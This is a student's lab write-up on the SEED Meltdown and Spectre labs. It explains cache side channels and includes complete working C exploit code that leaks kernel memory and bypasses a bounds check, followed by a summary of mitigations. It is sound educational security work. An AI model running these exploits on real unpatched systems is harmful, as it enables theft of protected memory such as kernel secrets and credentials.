2022-04-07

software-security-lab2

The famous Meltdown and Spectre: to my surprise, the first time I studied them was at school.
This is my SEED Labs report on the two labs.

meltdown

task1

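When array[3] and array[7] are filled in beforehand, accesses to them become noticeably faster.

Both were already loaded into the CPU cache, so reading them takes less time.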
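The measurement can be sketched roughly as follows. This is a minimal sketch, not the lab's own file: the names time_access, probe and measure_task1 are made up for illustration, and I assume the ten slots sit one 4096-byte stride apart so that each lands on its own cache line.

```c
#include <stdint.h>
#include <emmintrin.h>   /* _mm_clflush */
#include <x86intrin.h>   /* __rdtscp */

/* Hypothetical helper: number of TSC ticks one byte load takes. */
static uint64_t time_access(volatile uint8_t *addr)
{
    unsigned int aux = 0;
    uint64_t start = __rdtscp(&aux);
    uint8_t value = *addr;            /* the load being timed */
    uint64_t elapsed = __rdtscp(&aux) - start;
    (void)value;
    return elapsed;
}

static uint8_t probe[10 * 4096];

/* Fills cycles[0..9]. Slots 3 and 7 are touched beforehand, the rest are
 * flushed, so slots 3 and 7 are expected (not guaranteed) to be faster. */
void measure_task1(uint64_t cycles[10])
{
    int i;
    for (i = 0; i < 10; i++) probe[i * 4096] = 1;           /* back the pages with real memory */
    for (i = 0; i < 10; i++) _mm_clflush(&probe[i * 4096]); /* evict every slot from the cache */
    probe[3 * 4096] = 100;                                  /* bring two slots back in */
    probe[7 * 4096] = 200;
    for (i = 0; i < 10; i++) cycles[i] = time_access(&probe[i * 4096]);
}
```

Printing cycles[] over several runs should show slots 3 and 7 well below the others on most runs; the exact numbers depend on the machine.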

task2

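The second part uses a side-channel attack to recover the value whose slot is fast to access. At the top of the program a threshold is defined: an access that takes less time than the threshold is treated as a hit on an array slot that is already cached.

The key code is below. We iterate over the array and measure how many CPU cycles the access to each slot takes.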

void reloadSideChannel() 
{
  int junk=0;
  register uint64_t time1, time2;
  volatile uint8_t *addr;
  int i;
  for(i = 0; i < 256; i++){
     addr = &array[i*4096 + DELTA];
     time1 = __rdtscp(&junk);
     junk = *addr;
     time2 = __rdtscp(&junk) - time1;
     if (time2 <= CACHE_HIT_THRESHOLD){
         printf("array[%d*4096 + %d] is in cache.\n",i,DELTA);
         printf("The Secret = %d.\n",i);
     }
  }	
}

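From the earlier measurements, some access times fall below the threshold set here (80 cycles), and those slots give us the result.

Note, however, that it may take several runs to succeed.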
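The value 80 is only a starting point; the right threshold depends on the machine. One way to choose it, sketched here under my own assumptions (pick_threshold is a hypothetical helper, not part of the lab code), is to collect a few timings for slots known to be cached and a few for slots known to be flushed, then cut halfway between the two groups.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: returns a cut-off halfway between the slowest observed
 * cache hit and the fastest observed cache miss. Returns 0 if either set is
 * empty or the two sets overlap, meaning these samples give no clean threshold. */
uint64_t pick_threshold(const uint64_t *hits, size_t n_hits,
                        const uint64_t *misses, size_t n_misses)
{
    uint64_t max_hit = 0, min_miss = UINT64_MAX;
    size_t i;

    for (i = 0; i < n_hits; i++)
        if (hits[i] > max_hit) max_hit = hits[i];
    for (i = 0; i < n_misses; i++)
        if (misses[i] < min_miss) min_miss = misses[i];

    if (n_hits == 0 || n_misses == 0 || max_hit >= min_miss)
        return 0;
    return max_hit + (min_miss - max_hit) / 2;
}
```

For example, hit timings of 40, 52 and 60 cycles and miss timings of 180, 210 and 300 cycles give a threshold of 120.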

task3

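Here the lab authors provide a kernel module. The module first prints the address of secret_data; a user program can then interact with it through an entry the module defines (the /proc/secret_data file opened in the later code), which makes the module read secret_data so that it ends up in the cache. Our job is to read this secret data out.

So the goal of Task 3 is to obtain that line of output, the address of secret_data.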

task4

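Task 4 asks us to try accessing kernel data directly. Without Meltdown this obviously cannot work. Below is a simple test. To learn through printf that the read succeeded, execution would have to pass through a long chain of library calls, and long before that the CPU has detected the illegal access, so the data cannot be read out this way.

The source code is as follows, the same as in the lab handout.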

#include <stdio.h>

int main()
{
  // Kernel address of the secret; reading it from user space raises SIGSEGV.
  char *kernel_data_addr = (char*)0xf90a3000;
  char kernel_data = *kernel_data_addr;
  printf("I have reached here.\n");
  return 0;
}

task5

C has no native try...catch construct, so we use sigsetjmp() and siglongjmp() to perform the jump.

#include <stdio.h>
#include <setjmp.h>
#include <signal.h>

static sigjmp_buf jbuf;
static void catch_segv(int sig)
{
  // Roll back to the checkpoint set by sigsetjmp().
  siglongjmp(jbuf, 1);                         
}
int main()
{ 
  // The address of our secret data
  unsigned long kernel_data_addr = 0xfb61b000;
  // Register a signal handler
  signal(SIGSEGV, catch_segv);                     
  if (sigsetjmp(jbuf, 1) == 0) {                
     // A SIGSEGV signal will be raised. 
     char kernel_data = *(char*)kernel_data_addr; 
     // The following statement will not be executed.
     printf("Kernel data at address %lu is: %c\n", 
                    kernel_data_addr, kernel_data);
  }
  else {
     printf("Memory access violation!\n");
  }
  printf("Program continues to execute.\n");
  return 0;
}

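Below I walk through the code above with the help of the lab handout.

Early in main we register a handler for segmentation faults: the signal() call sets our own catch_segv as the handler for SIGSEGV.
Now look at catch_segv. It performs a long jump straight back to the position saved by sigsetjmp() on line 17. When line 17 first sets up the buffer, sigsetjmp() returns 0, so we pass the if check on line 17.
Inside that branch we try to access kernel data. This causes a segmentation fault, which is caught by the handler.
Once caught, the handler calls siglongjmp(jbuf, 1), which jumps back to line 17 and makes sigsetjmp() return 1 this time.
The return value 1 fails the check on line 17, so we enter the else branch and print the message saying that a memory access violation occurred.

Running the program shows that execution continues after the segmentation fault.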
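The same pattern can be wrapped into a small reusable function. The sketch below is my own illustration rather than lab code: try_read_byte and on_segv are hypothetical names, and it uses sigaction() instead of signal() so that the previous handler can be restored afterwards.

```c
#define _POSIX_C_SOURCE 200809L
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <string.h>

static sigjmp_buf probe_env;

static void on_segv(int sig)
{
    (void)sig;
    siglongjmp(probe_env, 1);   /* resume at sigsetjmp(), which now returns 1 */
}

/* Hypothetical helper: returns 1 and stores the byte in *out if addr is
 * readable, or 0 if the read raised SIGSEGV. */
int try_read_byte(const volatile uint8_t *addr, uint8_t *out)
{
    struct sigaction sa, old;
    volatile int ok = 0;        /* volatile: must stay valid across siglongjmp */

    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = on_segv;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old);

    if (sigsetjmp(probe_env, 1) == 0) {   /* 1: also save the signal mask */
        *out = *addr;                      /* may fault */
        ok = 1;
    }

    sigaction(SIGSEGV, &old, NULL);        /* restore the previous handler */
    return ok;
}
```

Calling it on an ordinary variable returns 1; calling it on an unmapped address returns 0 and the program keeps running, which is the "try...catch" behaviour the lab relies on.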

task6

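Task 6 introduces out-of-order execution on the CPU, using the following code as an example.

This was also covered in class: although the read raises a fault, under out-of-order execution the third and fourth assembly instructions are in fact still executed, and the data they touch is brought into the CPU cache.

In this lab we use the code below to observe out-of-order execution.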

#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#include <fcntl.h>
#include <emmintrin.h>
#include <x86intrin.h>

/*********************** Flush + Reload ************************/
uint8_t array[256*4096];
/* cache hit time threshold assumed*/
#define CACHE_HIT_THRESHOLD (80)
#define DELTA 1024

void flushSideChannel()
{
  int i;

  // Write to array to bring it to RAM to prevent Copy-on-write
  for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;

  //flush the values of the array from cache
  for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 + DELTA]);
}

void reloadSideChannel() 
{
  int junk=0;
  register uint64_t time1, time2;
  volatile uint8_t *addr;
  int i;
  for(i = 0; i < 256; i++){
     addr = &array[i*4096 + DELTA];
     time1 = __rdtscp(&junk);
     junk = *addr;
     time2 = __rdtscp(&junk) - time1;
     if (time2 <= CACHE_HIT_THRESHOLD){
         printf("array[%d*4096 + %d] is in cache.\n",i,DELTA);
         printf("The Secret = %d.\n",i);
     }
  }	
}
/*********************** Flush + Reload ************************/

void meltdown(unsigned long kernel_data_addr)
{
  char kernel_data = 0;
   
  // The following statement will cause an exception
  kernel_data = *(char*)kernel_data_addr;     
  array[7 * 4096 + DELTA] += 1;          
}

void meltdown_asm(unsigned long kernel_data_addr)
{
   char kernel_data = 0;
   
   // Give eax register something to do
   asm volatile(
       ".rept 400;"                
       "add $0x141, %%eax;"
       ".endr;"                    
    
       :
       :
       : "eax"
   ); 
    
   // The following statement will cause an exception
   kernel_data = *(char*)kernel_data_addr;  
   array[kernel_data * 4096 + DELTA] += 1;           
}

// signal handler
static sigjmp_buf jbuf;
static void catch_segv(int sig)
{
  siglongjmp(jbuf, 1);
}

int main()
{
  // Register a signal handler
  signal(SIGSEGV, catch_segv);

  // FLUSH the probing array
  flushSideChannel();
    
  if (sigsetjmp(jbuf, 1) == 0) {
     meltdown(0xfb61b000);                
  }
  else {
      printf("Memory access violation!\n");
  }

  // RELOAD the probing array
  reloadSideChannel();                     
  return 0;
}

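Line 53 of the code, array[7 * 4096 + DELTA] += 1, comes after the faulting load; if it is executed out of order, slot 7 ends up in the cache, so in principle we should see The Secret = 7. Nothing is actually leaked from the kernel here, because the index 7 is hard-coded. It may take a few runs before it succeeds.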

task7.1

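First I tried to modify the Task 6 code so that it reads kernel data. This is simple: before, the cache slot was hard-coded to 7, and here it only needs to become array[kernel_data * 4096 + DELTA]. However, after many attempts, even with the threshold raised to 200, I did not succeed.

As for DELTA and the 4096 stride: a page in the OS is 4 KB, so a stride of 4096 puts each of the 256 candidate values on its own page, far more than one 64-byte cache line apart. DELTA is added so that the slot for 0 does not share a cache line with whatever data sits right next to the start of the array.

Also, the reason 0 comes back so often is that when the access is found to lack permission, the value seen by the dependent instruction often appears to be 0 first. This may be similar to the sandbox check in Spectre.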
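The arithmetic behind the stride can be checked with a few lines. This is only an illustrative sketch: STRIDE and DELTA mirror the constants in the lab code, while LINE_SIZE = 64 is my assumption about the cache-line size, and the page and line indices are relative to the start of the array.

```c
#include <stddef.h>

#define STRIDE     4096   /* one 4 KB page per candidate value, as in the lab code */
#define LINE_SIZE  64     /* assumed cache-line size on typical x86 CPUs */
#define DELTA      1024

/* Byte offset of the probe slot for a candidate byte value. */
size_t probe_offset(unsigned value) { return (size_t)value * STRIDE + DELTA; }

/* Page and cache-line index (relative to the array start) the slot falls in. */
size_t probe_page(unsigned value) { return probe_offset(value) / STRIDE; }
size_t probe_line(unsigned value) { return probe_offset(value) / LINE_SIZE; }
```

Neighbouring values land 64 cache lines apart, so loading the slot for one value cannot accidentally warm the line of another, and the slot for 0 sits 1024 bytes into the array instead of at its very first byte.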

task7.2

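I tried adding the file-opening code directly to main, so that the kernel secret is loaded into the CPU cache ahead of time. This makes the subsequent load-and-add statements run much faster.

But even after adjusting the threshold as well, it still did not work: the data could not be obtained before the permission check completed.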

task7.3 asm problem

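This time I trigger Meltdown with inline assembly directly. The code is below; let me try to explain it. The CPU is held up at the inline assembly, which is slow: it is a long run of additions that all target the same register, so they depend on each other and cannot run in parallel. Thanks to out-of-order execution, after issuing some of the add instructions the CPU goes ahead and starts the kernel-data load that follows them, and obtains the data. My understanding is that, because the ALU is busy during this time, the window before the page-permission check takes effect is lengthened.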

void meltdown_asm(unsigned long kernel_data_addr)
{
   char kernel_data = 0;

   // Give eax register something to do
   asm volatile(
       ".rept 400;"
       "add $0x141, %%eax;"
       ".endr;"

       :
       :
       : "eax"
   );

   // The following statement will cause an exception
   kernel_data = *(char*)kernel_data_addr;
   array[kernel_data * 4096 + DELTA] += 1;
}

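After a long time trying, it finally worked. The result is shown in the figure below.

We can see that the first secret byte read is 83, the ASCII code of 'S'.

To read the data above, the code from 7.2 has to be merged in: first use the file operation to have the kernel module load the secret into the cache, then run the Meltdown attack, as shown in the figure below.

Still, the success rate remains very low.

I tried increasing and decreasing the loop count to see whether it helps. I changed the loop from 400 to 4000 and to 40000: with 4000 it succeeded a few times, but with 40000 it almost never succeeded. I inspected the compiled binary and the compiler did not seem to have optimized the loop away, so I am still not sure what the reason is.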

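To summarize the optimizations made above:

Load the secret string into the CPU cache beforehand, using the kernel module from earlier.
Use assembly code whose internal loop occupies the ALU and slows down the permission check. To explain the loop from first principles, as far as I understand it: the repeated additions occupy the ALU and all act on a single register, so they cannot run in parallel. Meanwhile, when a kernel address is accessed, the data is fetched for the CPU early on (at the decode stage, though I am not sure), whereas the later permission check needs the ALU. (Thinking back to the operating system I wrote myself, it also located the memory first and only then checked whether the page permissions were correct, so the data gets loaded in any case.)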

task8

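With a small change to the code above, all of the secret in the kernel can be read in a single run. The output shows that the recovered content is correct.

The code is as follows.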

#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#include <fcntl.h>
#include <emmintrin.h>
#include <x86intrin.h>

/*********************** Flush + Reload ************************/
uint8_t array[256*4096];
/* cache hit time threshold assumed*/
#define CACHE_HIT_THRESHOLD (80)
#define DELTA 1024

void flushSideChannel()
{
  int i;

  // Write to array to bring it to RAM to prevent Copy-on-write
  for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;

  //flush the values of the array from cache
  for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 + DELTA]);
}
// Note: scores is declared non-static here; it is reset after each byte is recovered.
int scores[256];

void reloadSideChannelImproved()
{
  int i;
  volatile uint8_t *addr;
  register uint64_t time1, time2;
  int junk = 0;
  for (i = 0; i < 256; i++) {
     addr = &array[i * 4096 + DELTA];
     time1 = __rdtscp(&junk);
     junk = *addr;
     time2 = __rdtscp(&junk) - time1;
     if (time2 <= CACHE_HIT_THRESHOLD)
        scores[i]++; /* if cache hit, add 1 for this value */
  }
}
/*********************** Flush + Reload ************************/

void meltdown_asm(unsigned long kernel_data_addr)
{
   char kernel_data = 0;
   
   // Give eax register something to do
   asm volatile(
       ".rept 400;"                
       "add $0x141, %%eax;"
       ".endr;"                    
    
       :
       :
       : "eax"
   ); 
    
   // The following statement will cause an exception
   kernel_data = *(char*)kernel_data_addr;  
   array[kernel_data * 4096 + DELTA] += 1;              
}

// signal handler
static sigjmp_buf jbuf;
static void catch_segv(int sig)
{
   siglongjmp(jbuf, 1);
}

int main()
{
  int i, j, ret = 0;
  int index;

  // Register signal handler
  signal(SIGSEGV, catch_segv);

  int fd = open("/proc/secret_data", O_RDONLY);
  if (fd < 0) {
    perror("open");
    return -1;
  }

  memset(scores, 0, sizeof(scores));
  flushSideChannel();

  // Loop over index to recover all 8 bytes of the secret in one run.
  for (index = 0; index < 8; index++) {
    // Retry 1000 times on the same address.
    for (i = 0; i < 1000; i++) {
      // Reading the proc entry makes the kernel module touch the secret,
      // which brings it into the cache.
      ret = pread(fd, NULL, 0, 0);
      if (ret < 0) {
        perror("pread");
        break;
      }

      // Flush the probing array
      for (j = 0; j < 256; j++)
        _mm_clflush(&array[j * 4096 + DELTA]);

      if (sigsetjmp(jbuf, 1) == 0) { meltdown_asm(0xf90a3000 + index); }

      reloadSideChannelImproved();
    }

    // Find the index with the highest score.
    int max = 0;
    for (i = 0; i < 256; i++) {
      if (scores[max] < scores[i]) max = i;
    }

    printf("The secret value for %d is %d %c\n", index, max, max);
    printf("The number of hits is %d\n", scores[max]);

    // Reset the scores before attacking the next byte.
    memset(scores, 0, sizeof(scores));
  }
  return 0;
}
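The outer loop can also be separated from the attack itself, which makes it possible to exercise the loop on a machine that is not vulnerable. The sketch below is an assumption-laden illustration: leak_byte_fn, leak_string and leak_from_memory are hypothetical names, and leak_from_memory is only a stand-in that reads ordinary user-space memory in place of the Meltdown read.

```c
#include <stddef.h>

/* Hypothetical callback type: returns the best guess (0..255) for the byte at addr. */
typedef int (*leak_byte_fn)(unsigned long addr);

/* Leaks len consecutive bytes starting at base into out and NUL-terminates it.
 * out must have room for len + 1 bytes. */
void leak_string(leak_byte_fn leak, unsigned long base, size_t len, char *out)
{
    size_t i;
    for (i = 0; i < len; i++)
        out[i] = (char)leak(base + i);
    out[len] = '\0';
}

/* Stand-in used only to exercise the loop: it reads the byte directly from
 * user-space memory, where a real attack would run the 1000-round
 * flush / meltdown_asm / reload sequence and return the top-scoring value. */
int leak_from_memory(unsigned long addr)
{
    return *(const unsigned char *)addr;
}
```

With the real attack plugged in as the callback, the eight recovered bytes come back as one printable string instead of eight separate lines.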

spectre

task3

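3.1 first introduces how out-of-order (speculative) execution works. The CPU records which branch earlier executions of an instruction took. So we first need to "train" the CPU to keep choosing the branch we want, so that it starts executing that branch speculatively.

void victim(size_t x) {   // size is 10 in what follows
  if (x < size) {
    temp = array[x * 4096 + DELTA];
  }
}

for (i = 0; i < 10; i++) {
    victim(i);  // i < 10, so the check inside victim() always passes
}

Next, if we try

victim(97);

the trained CPU still predicts the true branch and speculatively executes the body, even though 97 fails the check.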

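Commenting out the flush of size

If the flush of size is commented out, the success rate becomes very low.

This is because, without flushing size, the next time victim performs the check size is already in the CPU cache (or even in a register), so loading size and comparing it with x takes very little time. That window is too short for speculative execution to load our array slot into the cache.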

replace with (i+20)

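The success rate also drops sharply. This is because every training call now fails the check (i+20 is never less than size), so we are effectively training the CPU to expect the false outcome, and it no longer speculates down the true branch.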
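Both the normal training loop and the (i+20) experiment can be pictured with a toy model. The sketch below uses a single 2-bit saturating counter, a textbook simplification that I am assuming purely for illustration; real branch predictors are far more elaborate and not publicly documented. All names here are hypothetical.

```c
#include <stdbool.h>

/* Toy model only: states 0-1 predict "not taken", states 2-3 predict "taken". */
typedef struct { int state; } predictor;

bool predict_taken(const predictor *p) { return p->state >= 2; }

void train(predictor *p, bool taken)
{
    if (taken  && p->state < 3) p->state++;
    if (!taken && p->state > 0) p->state--;
}

/* Feeds n calls victim(start), victim(start + 1), ... with bound size into the
 * model, then reports what it predicts for the next call. */
bool prediction_after_training(unsigned start, unsigned n, unsigned size)
{
    predictor p = { 0 };
    unsigned i;
    for (i = 0; i < n; i++)
        train(&p, start + i < size);   /* outcome of the "x < size" check */
    return predict_taken(&p);
}
```

In this model, ten calls victim(0) to victim(9) with size 10 leave the counter predicting "taken", so the following victim(97) would be speculated into the body. Ten calls victim(20) to victim(29) leave it predicting "not taken", which matches the drop in success rate.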

task4

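Here we use Spectre for real to simulate an attack on something like a real-world sandbox. The principle is the same as above. As the output shows, the attack can succeed.

It does not succeed every time, though (which is normal), because we cannot predict when noise on the CPU will appear.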

task5

problem1

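Indeed, the value that wins is not necessarily the correct one; instead, element 0 often shows a short load time.

The reason is that most of the time the Spectre attack does not succeed. In that case restrictedAccess returns 0, so array[0*4096 + DELTA] is what gets loaded into the cache. This is really the failure case, so we need to exclude it.

After a simple modification (dropping element 0) we get the result below, which is indeed correct.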
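One place to drop element 0 is the final selection step. The sketch below is my own illustration (best_guess is a hypothetical name); the full program later in this post gets the same effect by starting its reload loop at i = 1 so that scores[0] is never incremented.

```c
/* Returns the value in 1..255 with the most cache hits. Index 0 is skipped
 * because a failed attempt also touches array[0*4096 + DELTA]. */
int best_guess(const int scores[256])
{
    int best = 1;
    int i;
    for (i = 2; i < 256; i++)
        if (scores[i] > scores[best]) best = i;
    return best;
}
```

With 900 hits on element 0, 40 hits on element 83 and 3 hits on element 10, the function returns 83 rather than 0.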

problem2

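I am not sure about this one. Going by discussions with the teacher and classmates, it should serve the same purpose as usleep: stalling for time.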

problem3 USLEEP

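usleep suspends the user thread, but memory loads that are already in flight are not stopped, so adding it gives those loads more time to finish. I also looked up some figures: one traditional (random-access) disk access takes about 15 milliseconds (ms), which is millions of clock cycles. One usleep(10) sleeps for 10 microseconds (μs), and 1 ms is 1000 μs. So if disk reads and writes are taken into account, a larger usleep argument may be needed, for example 15000 (the average access time), so that as many of the pending loads as possible can complete.

In my experiments, raising the usleep argument moderately does improve the success rate. Note that the number of hits below has indeed gone up.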

task6

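I added a simple loop to main, which makes it easy to obtain the final result, shown in the figure below. In the end I printed out the target string directly.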

#include <emmintrin.h>
#include <x86intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <unistd.h>


unsigned int bound_lower = 0;
unsigned int bound_upper = 9;
uint8_t buffer[10] = {0,1,2,3,4,5,6,7,8,9};
uint8_t temp    = 0;
char    *secret = "Seed_Lab";
uint8_t array[256*4096];

#define CACHE_HIT_THRESHOLD (80)
#define DELTA 1024

// Sandbox Function
uint8_t restrictedAccess(size_t x)
{
  if (x <= bound_upper && x >= bound_lower) {
     return buffer[x];
  } else {
     return 0;
  }
}

void flushSideChannel()
{
  int i;
  // Write to array to bring it to RAM to prevent Copy-on-write
  for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;
  //flush the values of the array from cache
  for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 + DELTA]);
}

static int scores[256];
void reloadSideChannelImproved()
{
  int i;
  volatile uint8_t *addr;
  register uint64_t time1, time2;
  int junk = 0;
  for (i = 1; i < 256; i++) {
    addr = &array[i * 4096 + DELTA];
    time1 = __rdtscp(&junk);
    junk = *addr;
    time2 = __rdtscp(&junk) - time1;
    if (time2 <= CACHE_HIT_THRESHOLD)
      scores[i]++; /* if cache hit, add 1 for this value */
  }
}

void spectreAttack(size_t index_beyond)
{
  int i;
  uint8_t s;
  volatile int z;

  for (i = 0; i < 256; i++)  { _mm_clflush(&array[i*4096 + DELTA]); }

  // Train the CPU to take the true branch inside victim().
  for (i = 0; i < 10; i++) {
    restrictedAccess(i);
  }

  // Flush bound_upper, bound_lower, and array[] from the cache.
  _mm_clflush(&bound_upper);
  _mm_clflush(&bound_lower);
  for (i = 0; i < 256; i++)  { _mm_clflush(&array[i*4096 + DELTA]); }
  for (z = 0; z < 100; z++)  {  }
  //
  // Ask victim() to return the secret in out-of-order execution.
  s = restrictedAccess(index_beyond);
  array[s*4096 + DELTA] += 88;
}

int main() {
  int i;
  int cnt;

  // Recover the 8 bytes of the secret one at a time.
  for (cnt = 0; cnt < 8; cnt++) {
    size_t index_beyond = (size_t)(&secret[cnt] - (char*)buffer);

    flushSideChannel();
    for (i = 0; i < 256; i++) scores[i] = 0;

    for (i = 0; i < 1000; i++) {
      //printf("*****\n");  // This seemingly "useless" line is necessary for the attack to succeed
      spectreAttack(index_beyond);
      usleep(10);
      reloadSideChannelImproved();
    }

    int max = 0;
    for (i = 0; i < 256; i++) {
      if (scores[max] < scores[i]) max = i;
    }

    printf("Reading secret value at index %zu\n", index_beyond);
    printf("The secret value[%d] is %d(%c)\n", cnt, max, max);
    printf("The number of hits is %d\n", scores[max]);
  }
  return (0);
}
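A note on index_beyond: it is simply the byte distance from buffer to the secret byte, so that buffer[index_beyond] names the secret's address. If the secret happens to sit below buffer in memory, the value wraps around to a huge size_t, and the address arithmetic still lands on the right byte. The helper below is a hypothetical sketch of the same computation done through uintptr_t, which sidesteps subtracting pointers into two different objects (something the C standard leaves undefined, although the lab code relies on it working).

```c
#include <stddef.h>
#include <stdint.h>

/* Distance in bytes from base to target, wrapping like unsigned arithmetic.
 * offset_from is an illustrative name, not part of the lab code. */
size_t offset_from(const void *base, const void *target)
{
    return (size_t)((uintptr_t)target - (uintptr_t)base);
}
```

In main, offset_from(buffer, &secret[cnt]) could stand in for the pointer subtraction.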

Summary

To summarize the similarities and differences between the two labs:

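Aspect	meltdown	spectre
Cause	The CPU executes out of order: on a memory access it first loads the data at the target address into the CPU cache and only then checks the permission. The cache is not cleaned up after the check fails, which makes a side-channel attack possible.	The CPU executes speculatively after a branch prediction and loads what follows the condition check ahead of time.
Trigger	Accessing kernel data that is not readable from user space	Within a process, accessing data outside the sandbox that should not be readable
Optimizations (raising the success rate)	1. Keep the ALU busy with assembly code 2. Load the data into the CPU cache beforehand 3. Statistical approach	1. Flush the values used in the comparison from the cache beforehand, so that the comparison takes longer. 2. Train the CPU to pick the path we want on every branch prediction, which effectively deceives it. 3. Statistical approach
Effect	Reading data that should not be readable	(same)
Mitigations	1. Use lfence, so that instructions after it are not executed ahead of time until the earlier instruction has completed 2. Disable out-of-order execution entirely (costly), or tell the CPU to execute serially in certain places 3. Reduce the precision of the timer interface the CPU provides (blurring only the high-precision part is enough), which makes side-channel attacks harder.	(same)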
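As an illustration of the first mitigation, here is a sketch of the sandbox function with a fence placed right after the bounds check. It is an assumption of mine about where the fence would go, not something taken from the lab code; restricted_access_fenced is a hypothetical name, and the buffer and bounds are copied from the Spectre program above.

```c
#include <stddef.h>
#include <stdint.h>
#include <emmintrin.h>   /* _mm_lfence */

static uint8_t buffer[10] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9};
static unsigned int bound_lower = 0;
static unsigned int bound_upper = 9;

/* Variant of restrictedAccess() with a speculation barrier after the check. */
uint8_t restricted_access_fenced(size_t x)
{
    if (x <= bound_upper && x >= bound_lower) {
        _mm_lfence();        /* the load below waits until the check has resolved */
        return buffer[x];
    }
    return 0;
}
```

The function returns the same values as before for every input; the only intended difference is that buffer[x] should no longer be loaded speculatively while the comparison is still pending, at the cost of stalling on every call.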

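These two very famous vulnerabilities taught me some approaches to finding hardware-level vulnerabilities, as well as how side-channel attacks work. I learned a lot.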

Title: software-security-lab2

Author:

Published: 2022-04-07, 16:38:21

Last updated: 2022-04-25, 17:17:26

Original link: https://nicholas-wei.github.io/2022/04/07/software-security-lab2/

License: "Attribution-NonCommercial-ShareAlike 4.0". Please keep the original link and author when reposting.